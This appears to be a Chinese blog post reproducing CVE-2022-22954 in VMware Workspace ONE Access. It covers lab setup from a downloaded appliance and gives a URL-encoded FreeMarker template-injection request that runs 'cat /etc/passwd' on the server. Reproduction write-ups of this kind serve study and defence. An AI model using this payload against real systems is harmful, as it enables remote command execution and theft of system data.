CVE-2022-22954 VMware Workspace ONE Access 复现

作者: print("") 分类: 漏洞复现 发布时间: 2022-04-13 21:50

ova下载如下:

https://www.carlstalhood.com/vmware-access#ovfdeploy

点进去之后,进行登录vm 账号发现是下载不了的

点击试用即可

然后进行下载

下载完成之后直接点击使用即可  这里需要设置一下fqdn

然后就是等待了

安装完之后

打开页面然后设置密码

要使用设置的域名才能进行设置数据库

然后访问:

https://id.test.local/ 

/catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%22%29%7d

代码调试参考:https://xz.aliyun.com/t/11196

代码块在/opt/vmware/horizon/workspace/webapps/catalog-portal 目录下

启动的Tomcat 目录在/usr/share/tomcat/

如果觉得我的文章对您有用,请随意打赏。您的支持将鼓励我继续创作!

发表评论

您的电子邮箱地址不会被公开。

更多阅读
标签云
Apache2.4.50 Apache ShenYu APISIX APISIX Dashboard cc5 CNVD-2021-49104 CNVD-2022-60632 CobaltStrike CobaltStrike xss CommonsCollections5 Confluence CVE-2021-26084 CVE-2017-18349 CVE-2021-4034 CVE-2021-37580 CVE-2021-41277 CVE-2021-41773 cve-2021-42013 CVE-2021-43798 CVE-2021-44228 CVE-2021-45232 CVE-2021-45232 RCE CVE-2022-22954 CVE-2022-22965 CVE-2022-39197 CVE-2023-28432 Django E-Office grafana keytool store log4j2 MetaBase ONE Access python python爬虫 socks5 socks5搜索 store 证书转换成nginx VMware Workspace ONE Access ysoserial 代理池工具 宝塔面板 泛微 畅捷通 畅捷通漏洞 通达OA